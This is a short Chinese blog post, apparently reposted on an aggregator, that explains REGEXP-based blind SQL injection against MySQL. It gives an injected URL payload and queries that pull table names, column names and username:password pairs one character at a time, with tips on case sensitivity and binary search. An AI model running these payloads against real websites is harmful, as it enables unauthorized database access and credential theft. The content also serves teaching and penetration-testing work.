zoukankan      html  css  js  c++  java
  • regexp盲注的一些改进

    index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*
    

      这是之前看别人的文章写的exp,觉得有点啰嗦,其实可以很直白的写

    select group_concat(table_name) from information_schema.tables where table_schema='security';
    select((select group_concat(table_name) from information_schema.tables where table_schema='security') regexp binary '^e');
    select group_concat(column_name) from information_schema.columns where table_name='users';
    select((select group_concat(column_name) from information_schema.columns where table_name='users') regexp binary '^i');
    select group_concat(username,':',password) from security.users;
    select((select group_concat(username,':',password) from security.users) regexp binary '^D');

    几个注意点

    1 可以直接用group_concat全部匹配出来

    2 mysql中用regexp是区分大小写的,只有对取md5的时候没关系,其他时候要加上binary,不过取数据时就不用group_concat了,用limit一条一条取

    3 regexp也可以用二分法 '^[a-z]' 到 '^[a-h]'

  • 相关阅读:
    ext DateTime.js在ie下显示不全
    js 获得每周周日到周一日期
    近十年one-to-one最短路算法研究整理【转】
    虚函数(实现多态)
    函数调用机制2
    函数调用机制
    面向对象的三大特性
    矩阵类c++实现
    矩阵求逆c++实现
    解决文件大小上传限制
  • 原文地址:https://www.cnblogs.com/junmoxiao/p/8506441.html
Copyright © 2011-2022 走看看